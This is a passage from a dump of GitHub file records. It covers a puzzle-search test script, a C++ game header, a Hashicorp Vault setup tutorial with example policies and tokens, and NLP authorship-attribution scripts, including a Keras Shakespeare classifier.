"max_line_length": 92,
"num_lines": 37,
"path": "/puzzle/test.py",
"repo_name": "koushikg14/ai",
"src_encoding": "UTF-8",
"text": "from puzzle import *\n\ndifficulty = 8\nrounds = 5\ngoal = parse_state(goal1)\nalgos = [bfs,dfs,idfs,uniform,astar, greedy, astar_lc, greedy_lc, astar_pattern]\n\nif __name__ == \"__main__\":\n train(goal)\n\n print \"Training finishes.\"\n \n # single round\n game = generate(goal, difficulty)\n solutions = [solve(game, goal, algo) for algo in algos]\n\n for solution in solutions:\n print solution\n\n print \"----------------\"\n \n # average performance\n stats = {}\n for algo in algos:\n stats[algo.__doc__] = [0,0,0,0]\n \n for i in range(rounds):\n game = generate(goal, difficulty)\n solutions = [solve(game, goal, algo) for algo in algos]\n for solution in solutions:\n stats[solution.algo] = [a+b for a,b in zip(stats[solution.algo],solution.stats)]\n\n for algo in stats.keys():\n stats[algo] = [x/rounds for x in stats[algo]]\n\n for algo, stat in stats.items():\n print algo + \":\" + str(stat)\n"
},
{
"alpha_fraction": 0.657182514667511,
"alphanum_fraction": 0.6592643857002258,
"avg_line_length": 16.573171615600586,
"blob_id": "d4c3868e8f61841c0e36278095996b22671a685d",
"content_id": "31ec963779aa31c035442fb4ce509ebc91759ab0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1441,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 82,
"path": "/isolation/src/types.h",
"repo_name": "koushikg14/ai",
"src_encoding": "UTF-8",
"text": "#ifndef TYPES_H_\n#define TYPES_H_\n\n#include <limits>\n\nconst double DMIN = std::numeric_limits<double>::min();\nconst double DMAX = std::numeric_limits<double>::max();\nconst double IMIN = std::numeric_limits<int>::min();\nconst double IMAX = std::numeric_limits<int>::max();\n\n\nstruct Position\n{\n\tint row;\n\tint col;\nPosition() : row(-1), col(-1) {}\nPosition(int r, int c) : row(r), col(c) {}\n};\n\n\ntypedef unsigned long Board;\n\nenum Direction {\n\tN,S,W,E,NW,NE,SW,SE,\n\tINVALID_DIR\n};\n\n\nstruct Action\n{\n\tDirection dir;\n\tint steps;\n\nAction(Direction d, int s) : dir(d), steps(s) {}\n};\n\nconst Action kInvalidAction = Action(INVALID_DIR, -1);\n\nstruct ScoreAction\n{\n\tdouble score;\n\tAction action;\nScoreAction(double s, Action act) : score(s), action(act) {}\n};\n\nbool inline operator==(const Position& lhs, const Position& rhs)\n{\n return lhs.row == rhs.row && lhs.col == rhs.col;\n}\n\nbool inline operator<(const Position& lhs, const Position& rhs)\n{\n\tif (lhs.row != rhs.row)\n\t\treturn lhs.row < rhs.row;\n\telse\n\t\treturn lhs.col < rhs.col;\n}\n\n\nstruct BfsNode\n{\n\tBoard board;\n\tPosition cur;\n\t\n\tint depth;\n\nBfsNode(Board b, Position pos) : board(b), cur(pos) {}\t\n\nBfsNode(Board b, Position pos, int d)\n: board(b), cur(pos), depth(d) {}\t\n};\n\nstruct BfsNodeCompare {\n\tbool operator() (const BfsNode& lhs, const BfsNode& rhs) const {\n\t\tif (lhs.board != rhs.board)\n\t\t\treturn lhs.board < rhs.board;\n\t\telse\n\t\t\treturn lhs.cur < rhs.cur;\n\t}\n};\n\n#endif // TYPES_H_\n"
}
] | 17 |
jcpowermac/vault-testing-doc | https://github.com/jcpowermac/vault-testing-doc | cdc32fec8e2311f25fe67c5eb69d7d49fd5c2948 | bf0eef0ceedb121f93fefb8374940b279dd4ec99 | 2f20057c6a5ce02134c42adfe264c7d97f2acba1 | refs/heads/master | 2020-12-25T15:17:56.815176 | 2016-06-27T20:48:15 | 2016-06-27T20:48:15 | 61,892,323 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6468885540962219,
"alphanum_fraction": 0.6657018661499023,
"avg_line_length": 37.44444274902344,
"blob_id": "05c686fec37ed31df20be49f869303a6920b630d",
"content_id": "478fe0bbaabc215eacafb155b393179ad2daad4b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 691,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 18,
"path": "/example/node/vault.js",
"repo_name": "jcpowermac/vault-testing-doc",
"src_encoding": "UTF-8",
"text": "var options = {\n apiVersion: 'v1', // default\n endpoint: 'http://vault:8200', // default\n token: '1234' // client token; can be fetched after valid initialization of the server\n};\n\n// get new instance of the client\nvar vault = require(\"node-vault\")(options);\n\n// init vault server\nvault.init({ secret_shares: 5, secret_threshold: 3 }, function(err, result) {\n var keys = result.keys;\n vault.token = result.root_token;\n // unseal vault server\n vault.unseal({ secret_shares: 3, key: keys[0] }, function(err, result) {});\n vault.unseal({ secret_shares: 3, key: keys[1] }, function(err, result) {});\n vault.unseal({ secret_shares: 3, key: keys[2] }, function(err, result) {});\n});"
},
{
"alpha_fraction": 0.6936026811599731,
"alphanum_fraction": 0.7138047218322754,
"avg_line_length": 32,
"blob_id": "8bf16a9ae6010e771840ff3833df677d79777a72",
"content_id": "b5ec5b5a4eb076a32c52988b6e9f5fd82010fb58",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 594,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 18,
"path": "/example/vault/Dockerfile",
"repo_name": "jcpowermac/vault-testing-doc",
"src_encoding": "UTF-8",
"text": "FROM centos\n\nRUN mkdir -p /opt/hashicorp/vault/bin/ && \\\n mkdir -p /var/opt/hashicorp/vault/ && \\\n mkdir -p /opt/hashicorp/vault/etc/policies && \\\n yum install -y unzip git wget vim epel-release && \\\n yum install -y python-pip python-devel && \\\n pip install hvac\n\nWORKDIR /opt/hashicorp/vault/bin/\nADD https://releases.hashicorp.com/vault/0.6.0/vault_0.6.0_linux_amd64.zip /opt/hashicorp/vault/bin/vault.zip\nRUN unzip vault.zip\n\nCOPY ansible.hcl /opt/hashicorp/vault/etc/policies\nCOPY vault.hcl /opt/hashicorp/vault/etc/\n\nCMD ./vault server -config ../etc/vault.hcl \nEXPOSE 8200\n"
},
{
"alpha_fraction": 0.6958333253860474,
"alphanum_fraction": 0.6986111402511597,
"avg_line_length": 19,
"blob_id": "dfab9797033325373d5a58549fc3c690b329106b",
"content_id": "d28680d8cb99e77767a7f6ebdf98e02a3b3a6dcc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 720,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 36,
"path": "/2_create_policy.md",
"repo_name": "jcpowermac/vault-testing-doc",
"src_encoding": "UTF-8",
"text": "#### Vault Policy\nWe want to create a policy where users only have access to a specific location. \nThe policy below will force `ansible` users to only read/write in the `secret/ansible` location.\n\n[ansible.hcl](example/vault/ansible.hcl) \n\n```\npath \"secret/ansible/*\" {\n policy = \"write\"\n}\n\npath \"secret/ansible/*\" {\n policy = \"read\"\n}\n\npath \"auth/token/lookup-self\" {\n policy = \"read\"\n}\n```\n\nFirst we will auth using our root token\n```\n> $ ./vault auth e2ce682e-60b1-78c6-efc0-f444c0c3c6fc\nSuccessfully authenticated! You are now logged in.\ntoken: e2ce682e-60b1-78c6-efc0-f444c0c3c6fc\ntoken_duration: 0\ntoken_policies: [root]\n```\nNext create the policy\n```bash\n> $ ./vault policy-write ansible ansible.hcl\nPolicy 'ansible' written.\n```\n\n\n[Next](3_create_userpass.md)\n"
},
{
"alpha_fraction": 0.5778748393058777,
"alphanum_fraction": 0.5989810824394226,
"avg_line_length": 30.227272033691406,
"blob_id": "6dd3bf2a24d3e8b7d7d29c5cc36059540fd2b90d",
"content_id": "3b9c699a5aad38ee8a3cd57359b5512cb9da1b73",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1377,
"license_type": "no_license",
"max_line_length": 211,
"num_lines": 44,
"path": "/4_write_read_example.md",
"repo_name": "jcpowermac/vault-testing-doc",
"src_encoding": "UTF-8",
"text": "#### Write and Read data\n\nUsing the root token lets create some dummy data\n```bash\n> $ ./vault write secret/foo value=bar\nSuccess! Data written to: secret/foo\n```\nAnd now that I have created a user for myself lets login with my jcallen account\n```bash\n> $ ./vault auth -method=userpass username=jcallen\nPassword (will be hidden):\nSuccessfully authenticated! You are now logged in.\nThe token below is already saved in the session. You do not\nneed to \"vault auth\" again with the token.\ntoken: cb370eaa-a9ec-6a53-0fe4-b08d08945313\ntoken_duration: 2591999\ntoken_policies: [ansible, default]\n```\n\nLet's try to read the data that root just wrote.\n```\n> $ ./vault read secret/foo [±master ●]\nError reading secret/foo: Error making API request.\n\nURL: GET http://172.17.0.3:8200/v1/secret/foo\nCode: 400. Errors:\n\n* permission denied\n```\nNo luck! Of course this was as intended.\n\nI should be able to write to `secret/ansible` lets try that\n```\n> $ ./vault write secret/ansible/foo value=bar\nSuccess! Data written to: secret/ansible/foo\n```\nAnd make sure we can read it too.\n```\n> $ ./vault read secret/ansible/foo\nKey Value\n--- -----\nrefresh_interval 2592000\nvalue bar\n```\n"
},
{
"alpha_fraction": 0.7385786771774292,
"alphanum_fraction": 0.7411167621612549,
"avg_line_length": 29.230770111083984,
"blob_id": "346d18feacc232f49fe65d2fdc36768a4a4553b3",
"content_id": "33af542eb6d7ba328f29d12034d06ada92dbbc83",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 394,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 13,
"path": "/3_create_userpass.md",
"repo_name": "jcpowermac/vault-testing-doc",
"src_encoding": "UTF-8",
"text": "\n#### Enable [userpass](https://www.vaultproject.io/docs/auth/userpass.html) auth backend\n```\n./vault auth-enable userpass\nSuccessfully enabled 'userpass' at 'userpass'!\n```\nOnce `userpass` is enabled we can create users\n```bash\n> $ ./vault write auth/userpass/users/jcallen password= policies=ansible\nSuccess! Data written to: auth/userpass/users/jcallen\n```\n\n\n[Next](4_write_read_example.md)\n"
},
{
"alpha_fraction": 0.7162162065505981,
"alphanum_fraction": 0.7267267107963562,
"avg_line_length": 40.625,
"blob_id": "ebf5532fb0248159fd4440f791ea06c90c7af429",
"content_id": "41b0c3202b7169de1607b89509dfbe8c557fabbf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 669,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 16,
"path": "/notes.md",
"repo_name": "jcpowermac/vault-testing-doc",
"src_encoding": "UTF-8",
"text": "# Notes\n\n```\njcallen@silicon ~/Development/vault-testing-doc [13:05:05]\n> $ sudo docker run -it vault [±master ●]\nError initializing core: Failed to lock memory: cannot allocate memory\n\nThis usually means that the mlock syscall is not available.\nVault uses mlock to prevent memory from being swapped to\ndisk. This requires root privileges as well as a machine\nthat supports mlock. Please enable mlock on your system or\ndisable Vault from using it. To disable Vault from using it,\nset the `disable_mlock` configuration option in your configuration\nfile.\n```\n[Fix for above](https://github.com/cgswong/docker-vault/issues/4)\n"
},
{
"alpha_fraction": 0.7396449446678162,
"alphanum_fraction": 0.7869822382926941,
"avg_line_length": 27.33333396911621,
"blob_id": "df5f3d903faa1fcff4948b964808800549a219be",
"content_id": "eaa2c4a8781828e1ba64d6631011d36a93e2b1a9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 169,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 6,
"path": "/example/node/Dockerfile",
"repo_name": "jcpowermac/vault-testing-doc",
"src_encoding": "UTF-8",
"text": "FROM node:wheezy\nRUN /usr/local/bin/npm install node-vault && /usr/local/bin/npm install -g node-inspector\nCMD node-inspector\nEXPOSE 8080\nEXPOSE 5828\nCOPY vault.js /root"
},
{
"alpha_fraction": 0.6376021504402161,
"alphanum_fraction": 0.6376021504402161,
"avg_line_length": 26.524999618530273,
"blob_id": "ffa9fb3d54e309f049a93433191a4d5c0505ab06",
"content_id": "3c43672b5cc5142b4f5e12f8c5224c8ebcdcbe27",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1101,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 40,
"path": "/example/ansible/library/vault.py",
"repo_name": "jcpowermac/vault-testing-doc",
"src_encoding": "UTF-8",
"text": "try:\n import hvac\n HAS_HVAC = True\nexcept ImportError:\n HAS_HVAC = False\n\ndef create_argument_spec():\n\n argument_spec = dict()\n argument_spec.update(\n url=dict(required=True, type='str'),\n username=dict(required=True, aliases=['user', 'admin'], type='str'),\n password=dict(required=True, aliases=['pass', 'pwd'], type='str', no_log=True),\n path=dict(required=True, type='str')\n )\n return argument_spec\n\n\ndef main():\n argument_spec = create_argument_spec()\n module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=False)\n\n if not HAS_HVAC:\n module.fail_json(msg=\"Hashicorp Vault Python library hvac required, please install.\") \n\n try:\n client = hvac.Client(url=module.params['url'])\n client.auth_userpass(module.params['username'], module.params['password'])\n results = client.read(module.params['path'])['data']\n\n module.exit_json(**results)\n except Exception as e:\n module.fail_json(msg=str(e))\n\n\nfrom ansible.module_utils.basic import *\n\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.6164483428001404,
"alphanum_fraction": 0.6819505095481873,
"avg_line_length": 23.74774742126465,
"blob_id": "eec2703429eeb3431d337fccfaa35ec595cbb84e",
"content_id": "1e687a6614d393d3a0ac6d22537a5937422c5b02",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2748,
"license_type": "no_license",
"max_line_length": 135,
"num_lines": 111,
"path": "/1_initial_config.md",
"repo_name": "jcpowermac/vault-testing-doc",
"src_encoding": "UTF-8",
"text": "#### [Server Configuration](https://www.vaultproject.io/docs/config/index.html)\nFor more details see Hashicorp Vault documentation. Since we will only have a single node\nfile as a backend is sufficient.\n\n[vault.hcl](example/vault.hcl) \n---\n```\nbackend \"file\" {\n path = \"/var/opt/hashicorp/vault/\"\n}\n\nlistener \"tcp\" {\n address = \"0.0.0.0:8200\"\n tls_disable = 1\n}\n```\n\n#### Using Docker Compose\n```bash\n> $ cd example\n> $ sudo docker-compose run vault\n```\n\n#### Build Image and Run manually\n```bash\n> $ cd example/vault\n> $ sudo docker build -t vault .\n> $ sudo docker run -it --cap-add IPC_LOCK vault ```\n```\nSee [notes.md](notes.md) for more information regarding `--cap-add`.\n\n#### Using Docker Compose\n```bash\n> $ cd example\n> $ sudo docker-compose run vault\n```\n\n#### Immediate interactive results\n\n```\n==> Vault server configuration:\n\n Backend: file\n Listener 1: tcp (addr: \"0.0.0.0:8200\", tls: \"disabled\")\n Log Level: info\n Mlock: supported: true, enabled: true\n Version: Vault v0.6.0\n\n==> Vault server started! Log data will stream in below:\n```\n\nThe vault server is running in the container and I am running the client on my local machine.\nFirst we need to set an environmental variable.\n```bash\n> $ export VAULT_ADDR='http://172.17.0.3:8200'\n```\n#### vault init\nNext initialize the vault.\n```bash\n./vault init\n```\nTypically the unseal keys would be kept private but this is just an example. By default\nfive unseal keys are created.\n```\nUnseal Key 1: 19ba958fd12e7c15bc5e6f228e48a847d04447aba1773f233c4da031bb6589b601\nUnseal Key 2: 19d0d0fffd4668fd51b5e6380c49c6c8624393e5be1e35b9b7742260a57641b302\nUnseal Key 3: d8ee2daa090844e7b3076a2ce708e3462a68d4c4b2485e7a66b39154df10cfae03\nUnseal Key 4: 3a8c7c9a22f2bbc52dc6f1b211ac1fd3c4c449e0a7257c6ff8da5afb7f3b941304\nUnseal Key 5: fbb281cfd6bc97dfcf747da6faed3a5d8cef0ec1ab7317ac291de9cf055d1a0e05\nInitial Root Token: e2ce682e-60b1-78c6-efc0-f444c0c3c6fc\n\nVault initialized with 5 keys and a key threshold of 3. Please\nsecurely distribute the above keys. When the Vault is re-sealed,\nrestarted, or stopped, you must provide at least 3 of these keys\nto unseal it again.\n\nVault does not store the master key. Without at least 3 keys,\nyour Vault will remain permanently sealed.\n\n```\n\n#### vault unseal\n```\n./vault unseal\n```\nUnseal needs to be ran for at least three times in this example based on the current `key threshold`.\n\n```bash\n> $ ./vault unseal\nKey (will be hidden):\nSealed: true\nKey Shares: 5\nKey Threshold: 3\nUnseal Progress: 1\n\n> $ ./vault unseal\nKey (will be hidden):\nSealed: true\nKey Shares: 5\nKey Threshold: 3\nUnseal Progress: 2\n\n> $ ./vault unseal\nKey (will be hidden):\nSealed: false\nKey Shares: 5\nKey Threshold: 3\nUnseal Progress: 0\n```\n\n[Next](2_create_policy.md)\n\n"
},
{
"alpha_fraction": 0.7451403737068176,
"alphanum_fraction": 0.7559395432472229,
"avg_line_length": 37.58333206176758,
"blob_id": "c24e0d69fb22d80476eea4a98d5004b442ea8904",
"content_id": "f41478764eba29017f123422f81c5982fe78e43e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 463,
"license_type": "no_license",
"max_line_length": 128,
"num_lines": 12,
"path": "/README.md",
"repo_name": "jcpowermac/vault-testing-doc",
"src_encoding": "UTF-8",
"text": "# Hashicorp Vault testing \nHashicorp's [documentation](https://www.vaultproject.io/docs/) is already very good this repo is mostly for me and my teammates.\n\n\nI have broken the inital process into multiple markdown documents. [Start here](1_initial_config.md)\n\n#### TOC\n\n- [Initial Configuration](1_initial_config.md)\n- [Create Policy](2_create_policy.md)\n- [Create Username and Passwords](3_create_userpass.md)\n- [Write and Read example](4_write_read_example.md)\n"
},
{
"alpha_fraction": 0.7418032884597778,
"alphanum_fraction": 0.7418032884597778,
"avg_line_length": 53,
"blob_id": "866f7b7d147d48f819d0cab06b3f8ea5a2760bbe",
"content_id": "5c5cedfed4ce83dbd1453064f76f753ec0693040",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 488,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 9,
"path": "/ISSUES.md",
"repo_name": "jcpowermac/vault-testing-doc",
"src_encoding": "UTF-8",
"text": "#### Current questions, issues and concerns \n\n- Where do we store the unseal keys?\n- Need SSL certificate, how to generate?\n- Determine a process (where?) of init, unseal, enable `userpass` and importing the policy\n- Should this really be in a container? \n - If yes: Need an entrypoint script to take care of the start/stop process.\n - If no: Need to write a systemd unit file to start and stop the service.\n- Should another method of authentication should be used than userpass\n\n\n"
}
] | 11 |
jlwatson/cs224n-project | https://github.com/jlwatson/cs224n-project | 265f8e4c6c8ec8000d779328850216b989d10b2c | 34ecee1d675d6c5f2e0b6198d08284010832a499 | a41da95480b4936a04f9bfdde9c14511a275f28f | refs/heads/master | 2021-09-09T23:24:45.342350 | 2018-03-20T05:40:16 | 2018-03-20T05:40:16 | 123,238,048 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5747074484825134,
"alphanum_fraction": 0.5792078971862793,
"avg_line_length": 26.774999618530273,
"blob_id": "06a205b43631373fe83ebee05b7a22dba2a41e88",
"content_id": "05402e9658da384f669e300a0d6e443b3b5d15d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2222,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 80,
"path": "/data/satoshi/extract-cyp-author.py",
"repo_name": "jlwatson/cs224n-project",
"src_encoding": "UTF-8",
"text": "import click\nimport re\n\nfrom itertools import filterfalse\n\nMAIL_HEADER = re.compile('^From [email protected].*$', re.MULTILINE)\nMESSAGE_ID = re.compile('^Message-ID: <(.*)>$', re.MULTILINE)\nMESSAGE_FROM = re.compile('^From: (.*)$', re.MULTILINE)\n\nPGP_SIG_BEGIN = \"-----BEGIN PGP SIGNATURE-----\"\nPGP_SIG_END = \"-----END PGP SIGNATURE-----\"\n\nREMOVE_PREFIX = set(s.lower() for s in [\n 'From:',\n 'To:',\n 'Subject:',\n 'Bcc:',\n 'Message-ID:',\n '>',\n \"Hal Finney\",\n \"Nick Szabo\"\n])\n\nREMOVE_LINES = set(s.lower() for s in [\n \"[email protected]\",\n \"Distribution:\",\n \" CYPHERPUNKS >INTERNET:[email protected]\",\n \"[email protected]\",\n \"-----BEGIN PGP SIGNED MESSAGE-----\",\n \"Hal\",\n \"[email protected]\",\n \"David\",\n \"Thanks,\"\n])\n\ndef process_email(email):\n lines = email.splitlines()\n\n if PGP_SIG_BEGIN in lines and PGP_SIG_END in lines:\n lines = lines[:lines.index(PGP_SIG_BEGIN)] + lines[lines.index(PGP_SIG_END) + 1:]\n\n lines = filterfalse(lambda x: x.lower() in REMOVE_LINES, lines)\n lines = filterfalse(lambda x: any(x.lower().startswith(prefix) for prefix in REMOVE_PREFIX), lines)\n\n return '\\n'.join(lines).strip()\n\[email protected]()\[email protected]('--archive', type=click.File('r', encoding='latin-1'), required=True)\[email protected]('--author', required=True)\ndef extract_author(archive, author):\n \"\"\"Extract author's emails from Cypherpunk archive.\"\"\"\n\n author = author.lower()\n content = archive.read()\n mails = MAIL_HEADER.split(content)\n print(len(mails), \"mails in archive.\")\n\n for mail in mails:\n mail = mail.strip()\n if mail == \"\":\n continue\n\n message_id = MESSAGE_ID.search(mail).group(1)\n message_author = MESSAGE_FROM.search(mail).group(1).strip().lower()\n\n if message_author == author:\n try:\n header_end = mail.index('\\n\\n')\n except:\n print(\"Couldn't find content for message:\", message_id)\n continue\n\n content = process_email(mail[header_end:].strip())\n print(\"Saving message:\", message_id)\n with open(message_id + \".txt\", \"wb\") as f:\n f.write(content.encode('utf8'))\nif __name__ == '__main__':\n extract_author()\n\n74076\n"
},
{
"alpha_fraction": 0.5798499584197998,
"alphanum_fraction": 0.583065390586853,
"avg_line_length": 28.15625,
"blob_id": "ebc9c1011add4794bc327ed77f597178cb1c94d5",
"content_id": "8ff243543c3d9983eb77f3ca78322a293d0a6a24",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 933,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 32,
"path": "/data/satoshi/download-less-wrong.py",
"repo_name": "jlwatson/cs224n-project",
"src_encoding": "UTF-8",
"text": "import argparse\nimport os\nimport requests\nimport time\n\nfrom itertools import filterfalse\n\ndef process_comment(source):\n lines = source.splitlines()\n lines = filterfalse(lambda x: x.startswith('>'), lines)\n return '\\n'.join(lines)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('user', help='The Less Wrong user')\n args = parser.parse_args()\n\n last_id = \"\"\n while True:\n url = \"http://lesswrong.com/user/%s/comments/.json?after=%s\" % (args.user, last_id)\n print(\"Downloading\", url, \"...\")\n data = requests.get(url).json()['data']['children']\n\n if len(data) == 0:\n break\n\n for comment in data:\n with open('lesswrong-' + comment['data']['name'] + \".txt\", \"wb\") as f:\n f.write(process_comment(comment['data']['body']).encode('utf8'))\n last_id = comment['data']['name']\n\n time.sleep(1)\n"
},
{
"alpha_fraction": 0.5941384434700012,
"alphanum_fraction": 0.6057605147361755,
"avg_line_length": 36.524715423583984,
"blob_id": "dface4f9180a1cd85bad694952fe2b8cc70e4312",
"content_id": "45cec4ddc418edb9d7e0da6a2fb27ad1fd11a31b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9895,
"license_type": "no_license",
"max_line_length": 156,
"num_lines": 263,
"path": "/shake-classification.py",
"repo_name": "jlwatson/cs224n-project",
"src_encoding": "UTF-8",
"text": "import argparse\nimport ast\nfrom collections import defaultdict\nimport hashlib\nimport json\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport pickle\nimport random\nimport sklearn.metrics\nimport utils\n\nfrom mkdir_p import mkdir_p\n\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping\nfrom keras.datasets import imdb\nfrom keras.layers import Dense, Embedding, LSTM, Dropout, Bidirectional, GRU\nfrom keras.models import Sequential\nfrom keras.preprocessing import sequence\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.utils import plot_model\n\nfrom attention_layer import Attention\n\nBATCH_SIZE = 32\nSPLIT_FRACTION = 0.1\nTRAIN_EPOCHS = 5\n\nMIN_SEQUENCE_LEN = 10\nMAX_SEQUENCE_LEN = 100\n\nDISPUTED_FILE = 'data/shakespeare/disputed_works_75.data'\n\nRESULT_DIR = \"shake_results\"\n\nTOKENIZER_FILE = RESULT_DIR + \"/tokenizer.pickle\"\nWEIGHTS_FILE = RESULT_DIR + \"/shake-weights.hdf5\"\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('data', help='Data file of (line, author, work) tuples. Use generate_data.py in data/shakespeare to generate new datasets.')\n parser.add_argument('--train', help='Run training.', action='store_true')\n parser.add_argument('--evaluate_test', help='Run evaluations on the test split.', action='store_true')\n parser.add_argument('--evaluate_val', help='Run evaluations on the val split.', action='store_true')\n parser.add_argument('--evaluate_disputed', help='Run model on disputed W.S. works.', action='store_true')\n args = parser.parse_args()\n\n mkdir_p(RESULT_DIR)\n\n if os.path.isfile(TOKENIZER_FILE):\n print(\"======= Loading Tokenizer =======\")\n with open(TOKENIZER_FILE, 'rb') as handle:\n tokenizer, data_tuples, author_id_map, works_id_map, lines_by_author_and_work = pickle.load(handle)\n\n else:\n print(\"======= Loading Plays =======\")\n print()\n\n with open(args.data, 'r') as data_handle:\n all_lines = [l.strip() for l in data_handle.readlines()]\n\n # strip \"// Metadata\", extract json metadata object, strip \"\\n // (<fields>)\"\n metadata = json.loads(all_lines[1])\n data = [ast.literal_eval(l) for l in all_lines[4:]]\n texts = [d[0] for d in data]\n\n authors = metadata[\"authors\"]\n works = metadata[\"works\"]\n\n # author_id -> author_name\n author_id_map = {a[1]: a[0] for a in authors}\n # work_id -> (work_name, author_id)\n works_id_map = {w[\"id\"]: (w[\"title\"], w[\"author\"]) for w in works}\n\n lines_by_author_and_work = {}\n for a in author_id_map.keys():\n lines_by_author_and_work[a] = defaultdict(list)\n\n for d in data:\n lines_by_author_and_work[d[1]][d[2]].append(d[0])\n\n tokenizer = Tokenizer()\n tokenizer.fit_on_texts(texts)\n\n data_tuples = []\n for author, works in lines_by_author_and_work.items():\n print(author_id_map[author], \"has\", len(works.keys()), \"works...\")\n for work, lines in works.items():\n print(\" \", str(works_id_map[work][0]) + \":\", len(lines), \"examples\")\n for l in tokenizer.texts_to_sequences(lines):\n # 0 == shakespeare, plz don't be mad\n data_tuples.append((l, 0 if author == 0 else 1))\n print()\n\n with open(TOKENIZER_FILE, 'wb') as handle:\n pickle.dump((tokenizer, data_tuples, author_id_map, works_id_map, lines_by_author_and_work), handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n print(len(tokenizer.word_counts), \"words in vocab.\")\n print()\n\n print(len(data_tuples), \"data tuples.\")\n counts = [0] * len(author_id_map)\n for _, label in data_tuples:\n counts[label] += 1\n\n print(\"Shakespeare 
has\", counts[0], \"labelled examples.\")\n print(\"Other authors have\", counts[1], \"labelled examples.\")\n\n random.seed(259812)\n random.shuffle(data_tuples)\n\n vocab_size = len(tokenizer.word_docs) + 1\n\n X = sequence.pad_sequences([d[0] for d in data_tuples], maxlen=MAX_SEQUENCE_LEN)\n y = [d[1] for d in data_tuples]\n\n split = int(SPLIT_FRACTION * len(data_tuples))\n X_train, y_train = X[split*2:], y[split*2:]\n X_val, y_val = X[split:split*2], y[split:split*2]\n X_test, y_test = X[:split], y[:split]\n\n print(\"X_train shape:\", X_train.shape)\n print(\"X_val shape:\", X_val.shape)\n print(\"X_test shape:\", X_test.shape)\n\n print('Build model...')\n model = Sequential()\n model.add(Embedding(vocab_size, 128, mask_zero=False))\n model.add(Bidirectional(LSTM(128, dropout=0.5, recurrent_dropout=0.5, return_sequences=True)))\n model.add(Attention(direction=\"bidirectional\"))\n model.add(Dense(50, activation='relu'))\n model.add(Dropout(0.5))\n model.add(Dense(1, activation='sigmoid'))\n\n model.compile(\n loss='binary_crossentropy',\n optimizer='adam',\n metrics=['accuracy']\n )\n\n plot_model(model, to_file=RESULT_DIR+'/shake-model.png')\n model.summary()\n\n if os.path.isfile(WEIGHTS_FILE):\n model.load_weights(WEIGHTS_FILE)\n\n if args.train:\n print(\"======= Training Network =======\")\n print()\n checkpointer = ModelCheckpoint(monitor='val_acc', filepath=WEIGHTS_FILE, verbose=1, save_best_only=True)\n earlystopping = EarlyStopping(monitor='val_acc', patience=10)\n model.fit(X_train, y_train,\n batch_size=BATCH_SIZE,\n epochs=TRAIN_EPOCHS,\n validation_data=(X_val, y_val),\n callbacks=[checkpointer, earlystopping])\n\n if args.evaluate_val:\n score, acc = model.evaluate(X_val, y_val, batch_size=BATCH_SIZE)\n print(\"Validation score:\", score)\n print(\"Validation accuracy:\", acc)\n\n with open(RESULT_DIR+\"/val-metrics.txt\", \"w\") as f:\n f.write(\"Val score: %s\\nVal accuracy: %s\" % (score, acc))\n\n pred = np.around(model.predict(X_val, batch_size=BATCH_SIZE))\n truth = np.around(y_val)\n cnf_matrix = sklearn.metrics.confusion_matrix(truth, pred)\n utils.plot_confusion_matrix(cnf_matrix, classes=[\"William Shakespeare\", \"Period playwrights\"], normalize=True, title=\"Val Split Confusion Matrix\")\n plt.savefig(RESULT_DIR+'/shake-val-confusion-matrix.png')\n plt.close()\n\n if args.evaluate_test:\n score, acc = model.evaluate(X_test, y_test, batch_size=BATCH_SIZE)\n print(\"Test score:\", score)\n print(\"Test accuracy:\", acc)\n\n pred = np.around(model.predict(X_test, batch_size=BATCH_SIZE))\n truth = np.around(y_test)\n cnf_matrix = sklearn.metrics.confusion_matrix(truth, pred)\n utils.plot_confusion_matrix(cnf_matrix, classes=[\"William Shakespeare\", \"Period playwrights\"], normalize=True, title=\"Shakespeare Confusion Matrix\")\n plt.savefig(RESULT_DIR+'/shake-test-confusion-matrix.png')\n plt.close()\n\n if args.evaluate_disputed:\n print()\n print(\"======= Evaluating Disputed Documents =======\")\n print()\n\n with 